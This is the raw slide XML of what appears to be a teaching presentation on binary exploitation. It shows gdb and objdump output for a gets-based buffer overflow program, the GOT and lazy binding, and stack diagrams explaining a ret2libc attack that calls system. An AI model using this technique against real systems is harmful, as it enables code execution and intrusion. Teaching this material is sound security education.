        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1351" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6746968" y="-1"/>
              <a:ext cx="2873237" cy="2151662"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="2873236" cy="2151660"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1349" name="Line"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="1233318" y="822679"/>
                <a:ext cx="1" cy="1328982"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="1016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0" name="gets的GOT表"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="2873237" cy="726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gets的GOT表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7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2" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1347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Lazy binding"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="5715110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Lazy binding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1355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pSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1360" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="743682" y="10219055"/>
            <a:ext cx="9620206" cy="2955291"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9620204" cy="2955289"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1356" name="root@Ubuntu : tmp ➤ objdump -S ./bof|more…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="120650"/>
              <a:ext cx="8973553" cy="283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rPr>
                  <a:solidFill>
                    <a:srgbClr val="C7B939"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:t>@</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="45C897"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Ubuntu</a:t>
              </a:r>
              <a:r>
                <a:t> : </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="F7509D"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>tmp</a:t>
              </a:r>
              <a:r>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="4EC5DA"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>➤ </a:t>
              </a:r>
              <a:r>
                <a:t>objdump -S ./bof|more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./bof:     file format elf32-i386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        ...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08048330 &lt;gets@plt&gt;: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 8048330:       ff 25 0c a0 04 08       jmp    *</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="FF2600"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>0x804a00c</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a: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rgbClr val="A9A9A9"/>
                  </a:solidFill>
                  <a:latin typeface="DejaVu Sans Mono for Powerline"/>
                  <a:ea typeface="DejaVu Sans Mono for Powerline"/>
                  <a:cs typeface="DejaVu Sans Mono for Powerline"/>
                  <a:sym typeface="DejaVu Sans Mono for Powerline"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t> 8048336:       68 00 00 00 00          push   $0x0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1359" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6746968" y="-1"/>
              <a:ext cx="2873237" cy="2151662"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="2873236" cy="2151660"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1357" name="Line"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="1233318" y="822679"/>
                <a:ext cx="1" cy="1328982"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="1016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8" name="gets的GOT表"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="2873237" cy="726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gets的GOT表</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1361" name="[gdb]&gt; ni…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10541000" y="571500"/>
            <a:ext cx="12490733" cy="1167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rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ni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[----------------------------------registers-----------------------------------]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EAX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0xc3a0061 ('a')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EBX</a:t>
            </a:r>
            <a:r>
              <a:t>: 0x0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ECX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0xf7fc25a0</a:t>
            </a:r>
            <a:r>
              <a:t> --&gt; 0xfbad2288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EDX</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:t>0xf7fc387c</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --&gt; 0x0 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ESI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0xf7fc2000</a:t>
            </a:r>
            <a:r>
              <a:t> --&gt; 0x1b1db0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EDI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0xf7fc2000</a:t>
            </a:r>
            <a:r>
              <a:t> --&gt; 0x1b1db0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EBP</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:t>0xffffd5f8</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --&gt; 0x0 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ESP</a:t>
            </a:r>
            <a:r>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd5d0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0xc3a0061 ('a')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EIP</a:t>
            </a:r>
            <a:r>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7509D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x8048493</a:t>
            </a:r>
            <a:r>
              <a:t> (&lt;main+40&gt;:      add    esp,0x10)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45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EFLAGS</a:t>
            </a:r>
            <a:r>
              <a:t>: 0x246 (</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>carry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PARITY</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>adjust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ZERO</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sign</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trap</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="F7509D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INTERRUPT</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>direction</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>overflow</a:t>
            </a:r>
            <a:r>
              <a:t>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[-------------------------------------code-------------------------------------]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0x804848a &lt;main+31&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="5F5F5F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lea    eax,[ebp-0xd]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0x804848d &lt;main+34&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="5F5F5F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>push   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84345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   0x804848e &lt;main+35&gt;: </a:t>
            </a:r>
            <a:r>
              <a:t>call   0x8048330 &lt;gets@plt&gt;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=&gt; 0x8048493 &lt;main+40&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>add    esp,0x10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0x8048496 &lt;main+43&gt;: mov    eax,0x0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0x804849b &lt;main+48&gt;: mov    edx,DWORD PTR [ebp-0xc]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0x804849e &lt;main+51&gt;: xor    edx,DWORD PTR gs:0x14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7B93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   0x80484a5 &lt;main+58&gt;: </a:t>
            </a:r>
            <a:r>
              <a:t>je     0x80484ac &lt;main+65&gt;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[------------------------------------stack-------------------------------------]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0000| </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd5d0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0xffffd5eb</a:t>
            </a:r>
            <a:r>
              <a:t> --&gt; 0xc3a0061 ('a')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0004| </a:t>
            </a:r>
            <a:r>
              <a:t>0xffffd5d4</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --&gt; 0x1 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0008| </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd5d8</a:t>
            </a:r>
            <a:r>
              <a:t> --&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7509D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xf7e3ea50</a:t>
            </a:r>
            <a:r>
              <a:t> (&lt;__new_exitfn+16&gt;:     add    ebx,0x1835b0)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0012| </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd5dc</a:t>
            </a:r>
            <a:r>
              <a:t> --&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7509D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x804850b</a:t>
            </a:r>
            <a:r>
              <a:t> (&lt;__libc_csu_init+75&gt;:   add    edi,0x1)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A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0016| </a:t>
            </a:r>
            <a:r>
              <a:t>0xffffd5e0</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --&gt; 0x1 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0020| </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd5e4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0xffffd6a4</a:t>
            </a:r>
            <a:r>
              <a:t> --&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd7d0</a:t>
            </a:r>
            <a:r>
              <a:t> ("/tmp/bof")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0024| </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd5e8</a:t>
            </a:r>
            <a:r>
              <a:t> --&gt; 0x61ffd6ac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0028| </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd5ec</a:t>
            </a:r>
            <a:r>
              <a:t> --&gt; 0x4c0c3a00 ('')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[------------------------------------------------------------------------------]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Legend: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7509D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rodata</a:t>
            </a:r>
            <a:r>
              <a:t>, value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0x08048493 in main ()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x/wx 0x804a00c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0x804a00c:      0xf7e6f3e0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x/i 0xf7e6f3e0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0xf7e6f3e0 &lt;_IO_gets&gt;:       push   ebp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Exploit ret2libc"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="6760777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Exploit ret2libc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136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365" name="After you can control EIP &amp; stack"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1835705" y="7160339"/>
            <a:ext cx="936530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60947" indent="-360947">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>After you can control EIP &amp; stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1366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1367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0x61616161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2600"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>0x61616161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368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9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0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1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2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3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4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5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6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7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378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379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380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381" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18729379" y="5591889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382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3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4" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="89446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385" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="9782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386" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="106210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387" name="0xe0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20908970" y="9306519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sp>
        <p:nvSpPr>
          <p:cNvPr id="1388" name="esp"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15071391" y="9306519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esp </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1389" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="16032670" y="9663389"/>
            <a:ext cx="1078458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90" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="639149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391" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="722969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392" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="806789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Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17192541" y="11356378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5" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17192541" y="10518178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6" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17192541" y="9667278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7" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17192541" y="8841778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8" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17192541" y="8003578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9" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17192541" y="7152678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0" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17192541" y="631275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1" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17192541" y="547455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2" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17192541" y="464734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3" name="stack"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18424430" y="3708400"/>
            <a:ext cx="1171239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404" name="Low"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934519" y="430271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405" name="High"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934531" y="12684719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406" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18729379" y="4748940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407" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18729379" y="5590578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408" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17192541" y="12194578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9" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17192541" y="11356378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10" name="0xe0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20908970" y="9306519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sp>
        <p:nvSpPr>
          <p:cNvPr id="1411" name="Ret after call func"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17242809" y="9759616"/>
            <a:ext cx="366172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42192"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Ret after call func</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1412" name="Function address"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17268035" y="8914895"/>
            <a:ext cx="361127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Function address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1413" name="esp"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15071391" y="9306519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esp </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1414" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="16032670" y="9663389"/>
            <a:ext cx="1078458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15" name="Argv1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18360806" y="10622862"/>
            <a:ext cx="12984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Argv1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1416" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="639149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417" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="722969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418" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="806789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419" name="Argv2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18360806" y="11507137"/>
            <a:ext cx="12984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pPr/>
            <a:r>
              <a:t>Argv2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1420" name="Argv3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18360806" y="12324662"/>
            <a:ext cx="12984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pPr/>
            <a:r>
              <a:t>Argv3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1421" name="Exploit ret2libc"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="6760777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Exploit ret2libc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1422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423" name="When you can control EIP &amp; stack…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1835705" y="7160339"/>
            <a:ext cx="9839772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When you can control EIP &amp; stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="360947" indent="-360947">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Do a function call!!!!!!!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142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1425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0x61616161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2600"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Function address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426" name="System function只使用一個參數，故argv2,3放null"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1871185" y="11249739"/>
            <a:ext cx="1117732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System function只使用一個參數，故argv2,3放null</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1427" name="Screen Shot 2019-05-14 at 2.52.05 PM.png" descr="Screen Shot 2019-05-14 at 2.52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69" y="6465519"/>
            <a:ext cx="13438757" cy="4726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7" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1426" grpId="2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Exploit ret2libc"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="6760777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Exploit ret2libc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1430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431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1432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0x61616161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2600"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>system address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1460" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15071391" y="3708399"/>
            <a:ext cx="6933138" cy="9613861"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6933137" cy="9613859"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1433" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="212114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34" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149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35" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149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36" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149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37" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149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38" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149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39" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149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40" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149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41" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149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42" name="stack"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3353038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1443" name="Low"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5863127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1444" name="High"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5863139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1445" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3657987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1446" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3657987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1447" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149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48" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="212114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49" name="0xe0"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5837578" y="5598119"/>
              <a:ext cx="109556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0xe0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1450" name="Ret after call func"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2171417" y="6051216"/>
